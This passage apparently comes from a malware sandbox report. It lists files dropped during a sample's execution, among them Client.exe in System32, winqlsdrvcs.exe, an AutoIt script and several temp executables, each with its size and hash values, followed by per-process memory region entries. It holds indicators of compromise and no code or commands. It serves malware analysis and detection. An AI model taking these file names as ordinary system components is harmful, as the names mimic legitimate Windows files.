                                                                                                                                                                            124df3f617f562e46095776454e1c0c7bb791cc7

                                                                                                                                                                            SHA256

                                                                                                                                                                            85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

                                                                                                                                                                            SHA512

                                                                                                                                                                            5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
                                                                                                                                                                            Filesize

                                                                                                                                                                            3KB

                                                                                                                                                                            MD5

                                                                                                                                                                            f6088750ba538b83515376568abb6410

                                                                                                                                                                            SHA1

                                                                                                                                                                            0820d8092129584e56a23fda9803b90332a143d8

                                                                                                                                                                            SHA256

                                                                                                                                                                            44d154ee5012d74927236ec0cb21faf3cedfa9140b94b36c0ec12ef991e98fc6

                                                                                                                                                                            SHA512

                                                                                                                                                                            baffb38a545e497b357dbc8c67b5a449ac75b49c04490cd94e8277d063c022743620f8eb058c68b6ab06eb4d359781baf62737313c04beaa1f3cea28d91b2d46

                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VAZ9BRAM04AI23KGDPY.temp
                                                                                                                                                                            Filesize

                                                                                                                                                                            7KB

                                                                                                                                                                            MD5

                                                                                                                                                                            cd6bc325b2cbdf2fcf027edbf10c8079

                                                                                                                                                                            SHA1

                                                                                                                                                                            d3e7735efbd3eefab73b11f4124d20de596fc5ef

                                                                                                                                                                            SHA256

                                                                                                                                                                            90c01aa51f7e84cb205438f569c94a39628af178fc5105ab8b5e179db7c7a2c7

                                                                                                                                                                            SHA512

                                                                                                                                                                            ef7de3f8d88a1ece600dc881a4d1b9aeb3e773f4e891cf2085b06f7bd0413e18d6b3aa122eefbf3b66094bbd9e3f9a4b727d5e27d797ebe412cf4df97a02e926

                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDKAGXM5O4I9JII5AGMI.temp
                                                                                                                                                                            Filesize

                                                                                                                                                                            7KB

                                                                                                                                                                            MD5

                                                                                                                                                                            6ab86681e28e7435994be0f8c6831c70

                                                                                                                                                                            SHA1

                                                                                                                                                                            9ee50d4c398ae53edc06febecf9d4cbad51bb948

                                                                                                                                                                            SHA256

                                                                                                                                                                            1cf6e90eeb070f07985f90c89b651ea4dbabbc0eb4c2e782bd925b1886d6fecf

                                                                                                                                                                            SHA512

                                                                                                                                                                            9c62e05081e6a2bc9aa4ae3845ec114f7ed69082e1db3bc4aff5c8f9c60d5ab75dc234d47f0845fe4a9bea7e5ae3dcc008db80aa6c08b2efbcf63c0e02e78896

                                                                                                                                                                          • C:\Windows\SysWOW64\slwga.dll
                                                                                                                                                                            Filesize

                                                                                                                                                                            14KB

                                                                                                                                                                            MD5

                                                                                                                                                                            788a402d0fcc43662ba8b73c85c63c7f

                                                                                                                                                                            SHA1

                                                                                                                                                                            d5cec0d57a7516db6cdecbdc3d335db24444037b

                                                                                                                                                                            SHA256

                                                                                                                                                                            79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60

                                                                                                                                                                            SHA512

                                                                                                                                                                            8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e

                                                                                                                                                                          • C:\Windows\SysWOW64\sppwmi.dll
                                                                                                                                                                            Filesize

                                                                                                                                                                            116KB

                                                                                                                                                                            MD5

                                                                                                                                                                            bad4c7c3c11d8bd6b7f81887cb3cac5f

                                                                                                                                                                            SHA1

                                                                                                                                                                            80e23c13e67e6af29a2deb31a643148e69887c53

                                                                                                                                                                            SHA256

                                                                                                                                                                            a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4

                                                                                                                                                                            SHA512

                                                                                                                                                                            27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8

                                                                                                                                                                          • C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                            Filesize

                                                                                                                                                                            12KB

                                                                                                                                                                            MD5

                                                                                                                                                                            161a5f076af5f6268665ebbcf53a4937

                                                                                                                                                                            SHA1

                                                                                                                                                                            1cab495c456d4d7dfc936a13b800884af8554704

                                                                                                                                                                            SHA256

                                                                                                                                                                            62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55

                                                                                                                                                                            SHA512

                                                                                                                                                                            ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35

                                                                                                                                                                          • C:\Windows\System32\Client.exe
                                                                                                                                                                            Filesize

                                                                                                                                                                            3.1MB

                                                                                                                                                                            MD5

                                                                                                                                                                            4a603ec4e3c5a21400eaabac7c6401c6

                                                                                                                                                                            SHA1

                                                                                                                                                                            23b446721eacd0b6796407ca20bd1e01355ab41f

                                                                                                                                                                            SHA256

                                                                                                                                                                            566ba756b7fc2174fc195c05d9e0a36aa706e4ce397f890488227b7d0ad4ad7c

                                                                                                                                                                            SHA512

                                                                                                                                                                            070a5dd14bce16ba58eb65f3b3143fc7890f0e34f2ed7f3a1930e3fa8454ebcf615b43c819f16f4fc494676443bd409a3a57e8fe6e8f39ab02df5ace497eaea0

                                                                                                                                                                          • C:\Windows\winqlsdrvcs.exe
                                                                                                                                                                            Filesize

                                                                                                                                                                            14KB

                                                                                                                                                                            MD5

                                                                                                                                                                            686899bd841d603551a0429d09cb906c

                                                                                                                                                                            SHA1

                                                                                                                                                                            c827bc460766c0c39fa9ad27918fb0f409379eb3

                                                                                                                                                                            SHA256

                                                                                                                                                                            483142a79ce1fce6474da5dcfeea48104eda46a960c7eb9b9581d555dd6cfc77

                                                                                                                                                                            SHA512

                                                                                                                                                                            850919af70b4b0548fc985b49fa35f5613c31bde6fb46b19753b181c25e0251c52b121a26459c230a969e8ae23fb1dccd547be6a34d2a73dfe4e0d31e6874b76

                                                                                                                                                                          • \Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                            MD5

                                                                                                                                                                            8358f1dd3fc6a236434e9eff45f1a2d8

                                                                                                                                                                            SHA1

                                                                                                                                                                            7a0007ca44015af841015f0775752fede3c167e1

                                                                                                                                                                            SHA256

                                                                                                                                                                            1f4436584109c2fd0240f92a4d978c6ec021268505515f1e4cf27938db53e849

                                                                                                                                                                            SHA512

                                                                                                                                                                            477325120bcdc745bab552eef142100d12d6c46679b979773e938d79c528cc4b2de6412ac621a2d8d0773d3d35663e1e0950deb9b4183fcf783fc6273918f7e7

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\FUT.au3
                                                                                                                                                                            Filesize

                                                                                                                                                                            872KB

                                                                                                                                                                            MD5

                                                                                                                                                                            c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                                            SHA1

                                                                                                                                                                            2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                                            SHA256

                                                                                                                                                                            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                                            SHA512

                                                                                                                                                                            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\SIG.EXE
                                                                                                                                                                            Filesize

                                                                                                                                                                            3.4MB

                                                                                                                                                                            MD5

                                                                                                                                                                            64fb7bebeb2e58cdeef83cc42f624f1b

                                                                                                                                                                            SHA1

                                                                                                                                                                            242307f03a7d9dc7c76737246d710bf10efe998f

                                                                                                                                                                            SHA256

                                                                                                                                                                            0965f85212e3c5fc2cd3e14499fd65b90c5aac7029a3d0afd61525284c5dc88f

                                                                                                                                                                            SHA512

                                                                                                                                                                            ec21a3064b68dd87a13e5128cc279ed3ea92c3aa26b245aaf7211ba3cf5bf32c71476b679d0c7a9b94035e18bdb9dea1fe8eb053f7c30d791a026ba4e5398cec

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\a\oiii.exe
                                                                                                                                                                            Filesize

                                                                                                                                                                            291KB

                                                                                                                                                                            MD5

                                                                                                                                                                            7562a8f108271b96994b95ea35494f7f

                                                                                                                                                                            SHA1

                                                                                                                                                                            42bf054fd00311f2a47f89c0c1d5674ff485ac71

                                                                                                                                                                            SHA256

                                                                                                                                                                            0eda07e22619ffa11c789a1ebf945d8f8510a210dc7b1c898a9a09e706ad4b4c

                                                                                                                                                                            SHA512

                                                                                                                                                                            e43076d160b33bd26845f7144e848b729d5fd329045835ced8d715dbcaff3fc0ca3bfad3f736a467c2835517fd548eee4aca8ec30a8655ec79777d5628e54259

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\is-NKJOL.tmp\crt.tmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            680KB

                                                                                                                                                                            MD5

                                                                                                                                                                            2b1448b48874851ff092b32dae44cfea

                                                                                                                                                                            SHA1

                                                                                                                                                                            a156c72c6f87817a3c88a0232bbafa39aa36301b

                                                                                                                                                                            SHA256

                                                                                                                                                                            08d83cc7c62e673495c8e18b6ff1e7600397c7ff9c3bd3b580678d50fcf3e950

                                                                                                                                                                            SHA512

                                                                                                                                                                            923195ffefc70808c1f63688e40500021b4a75e660c00dd110e08a6910f8ac85aef0736116f76096fffb34966aafff1bb3c5c2d6ff809951a94b47e2625bb3a7

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\is-NRU10.tmp\_isetup\_iscrypt.dll
                                                                                                                                                                            Filesize

                                                                                                                                                                            2KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a69559718ab506675e907fe49deb71e9

                                                                                                                                                                            SHA1

                                                                                                                                                                            bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                                                            SHA256

                                                                                                                                                                            2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                                                            SHA512

                                                                                                                                                                            e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\is-NRU10.tmp\_isetup\_isdecmp.dll
                                                                                                                                                                            Filesize

                                                                                                                                                                            13KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a813d18268affd4763dde940246dc7e5

                                                                                                                                                                            SHA1

                                                                                                                                                                            c7366e1fd925c17cc6068001bd38eaef5b42852f

                                                                                                                                                                            SHA256

                                                                                                                                                                            e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

                                                                                                                                                                            SHA512

                                                                                                                                                                            b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

                                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\is-NRU10.tmp\_isetup\_shfoldr.dll
                                                                                                                                                                            Filesize

                                                                                                                                                                            22KB

                                                                                                                                                                            MD5

                                                                                                                                                                            92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                                                                            SHA1

                                                                                                                                                                            3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                                                            SHA256

                                                                                                                                                                            9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                                                            SHA512

                                                                                                                                                                            9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                                                          • memory/548-15507-0x0000000001340000-0x000000000134C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            48KB

                                                                                                                                                                          • memory/684-219-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-247-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-251-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-190-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-221-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-189-0x0000000000D30000-0x0000000000E0C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            880KB

                                                                                                                                                                          • memory/684-191-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-213-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-245-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-193-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-227-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-217-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-223-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-225-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-243-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-229-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-231-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-237-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-239-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-253-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-249-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-241-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-197-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-199-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-201-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-203-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-206-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-207-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-209-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-211-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-235-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-188-0x00000000010C0000-0x0000000001134000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            464KB

                                                                                                                                                                          • memory/684-195-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-233-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/684-215-0x0000000000D30000-0x0000000000E07000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            860KB

                                                                                                                                                                          • memory/1328-16748-0x0000000000380000-0x00000000003F0000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            448KB

                                                                                                                                                                          • memory/1328-16749-0x0000000000790000-0x00000000007D8000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            288KB

                                                                                                                                                                          • memory/1328-16750-0x0000000000830000-0x0000000000860000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            192KB

                                                                                                                                                                          • memory/1328-16751-0x0000000000860000-0x0000000000890000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            192KB

                                                                                                                                                                          • memory/1748-16827-0x0000000000810000-0x0000000000818000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB

                                                                                                                                                                          • memory/2740-102-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            4KB

                                                                                                                                                                          • memory/2740-16914-0x0000000140000000-0x0000000140005000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            20KB

                                                                                                                                                                          • memory/2740-16475-0x0000000140000000-0x0000000140005000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            20KB

                                                                                                                                                                          • memory/2740-1-0x0000000000120000-0x0000000000128000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB

                                                                                                                                                                          • memory/2740-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            4KB

                                                                                                                                                                          • memory/2740-16913-0x0000000140000000-0x0000000140005000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            20KB

                                                                                                                                                                          • memory/2740-2-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/2740-103-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            9.9MB

                                                                                                                                                                          • memory/2740-16474-0x0000000140000000-0x0000000140005000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            20KB

                                                                                                                                                                          • memory/3008-6625-0x0000000000370000-0x00000000003E4000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            464KB

                                                                                                                                                                          • memory/3008-6626-0x0000000001F10000-0x0000000001FEC000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            880KB

                                                                                                                                                                          • memory/3528-16789-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            88KB

                                                                                                                                                                          • memory/3944-17127-0x0000000000FF0000-0x0000000001008000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            96KB

                                                                                                                                                                          • memory/4988-13016-0x0000000000400000-0x000000000062C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/4988-13006-0x0000000000400000-0x000000000062C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/5060-16743-0x00000000021F0000-0x0000000002224000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            208KB

                                                                                                                                                                          • memory/5060-16738-0x0000000000BB0000-0x0000000000C58000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            672KB

                                                                                                                                                                          • memory/5060-16740-0x0000000000B70000-0x0000000000BA4000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            208KB

                                                                                                                                                                          • memory/5060-16739-0x00000000006D0000-0x000000000071C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            304KB

                                                                                                                                                                          • memory/5068-17233-0x000000001B4A0000-0x000000001B782000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.9MB

                                                                                                                                                                          • memory/5068-17234-0x0000000001E40000-0x0000000001E48000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB

                                                                                                                                                                          • memory/5332-16455-0x0000000000E40000-0x0000000001164000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            3.1MB

                                                                                                                                                                          • memory/5584-13018-0x0000000000400000-0x000000000062C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/5584-15460-0x0000000000400000-0x000000000062C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/5920-16607-0x0000000019F50000-0x000000001A232000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.9MB

                                                                                                                                                                          • memory/5920-16608-0x0000000000E20000-0x0000000000E28000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB

                                                                                                                                                                          • memory/6232-16764-0x0000000000400000-0x0000000000410000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            64KB

                                                                                                                                                                          • memory/6240-17195-0x0000000001360000-0x00000000013AE000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            312KB

                                                                                                                                                                          • memory/6724-15395-0x0000000002210000-0x000000000225C000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            304KB

                                                                                                                                                                          • memory/6724-15394-0x0000000004640000-0x00000000046DE000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            632KB

                                                                                                                                                                          • memory/6724-13065-0x0000000004CF0000-0x0000000004E06000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            1.1MB

                                                                                                                                                                          • memory/6724-13064-0x0000000000150000-0x0000000000228000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            864KB

                                                                                                                                                                          • memory/7292-17200-0x0000000000340000-0x0000000000346000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            24KB

                                                                                                                                                                          • memory/7292-17199-0x00000000011C0000-0x00000000011F8000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            224KB

                                                                                                                                                                          • memory/7416-16465-0x0000000000A50000-0x0000000000D74000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            3.1MB

                                                                                                                                                                          • memory/7512-16476-0x0000000140000000-0x0000000140004248-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            16KB

                                                                                                                                                                          • memory/7884-16803-0x0000000000AB0000-0x0000000000CD0000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.1MB

                                                                                                                                                                          • memory/7972-16808-0x00000000012B0000-0x00000000012B8000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB

                                                                                                                                                                          • memory/8372-15439-0x00000000038D0000-0x0000000003AFC000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/8372-13004-0x00000000038D0000-0x0000000003AFC000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.2MB

                                                                                                                                                                          • memory/8588-6507-0x00000000010A0000-0x00000000010B0000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            64KB

                                                                                                                                                                          • memory/8664-6516-0x0000000000A70000-0x0000000000A88000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            96KB

                                                                                                                                                                          • memory/8912-16588-0x000000001BBC0000-0x000000001BEA2000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            2.9MB

                                                                                                                                                                          • memory/8912-16589-0x0000000001F00000-0x0000000001F08000-memory.dmp
                                                                                                                                                                            Filesize

                                                                                                                                                                            32KB